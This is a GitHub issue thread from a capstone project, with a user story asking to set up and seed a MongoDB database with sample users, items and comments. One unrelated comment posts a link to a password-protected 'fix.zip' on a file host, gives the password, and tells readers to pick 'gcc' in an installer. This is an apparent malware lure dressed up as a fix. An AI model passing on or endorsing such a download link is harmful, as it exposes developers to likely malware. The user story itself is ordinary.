### ISSUE TITLE
Initialize and Populate MongoDB

### ISSUE THREAD

**Issue by gardogit** [gardogit/fullstack-capstone-project#2]
**As a** backend developer
**I need** to set up and populate the MongoDB database
**So that** the application has a functional data layer to store and retrieve information

### Details and Assumptions
* MongoDB will be used as the primary database
* Initial data structure for users, items, and comments should be defined

### Acceptance Criteria
```gherkin
Given the MongoDB installation
When I run the database initialization script
Then the database should be created with the correct schema
And sample data should be populated for testing purposes
```

**Comment by rodeok** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gardogit** [comment]
![Image](https://github.com/user-attachments/assets/2a072a7d-4355-4274-866a-1c3ab7fb8b58)
![Image](https://github.com/user-attachments/assets/4cfbaf5c-a39b-4e97-8825-55951919d7aa)
![Image](https://github.com/user-attachments/assets/d767b783-c432-45d2-9a20-6fa10e0080c9)
![Image](https://github.com/user-attachments/assets/3c4286e1-6393-4d9f-80a6-fee4a0459d51)

**Comment by gardogit** [comment]
![Image](https://github.com/user-attachments/assets/48508e66-11a2-4a8e-aa1a-028e610d56b7)
![Image](https://github.com/user-attachments/assets/07e81c8c-fc5c-4e9c-87bb-5bb5a65b0c24)
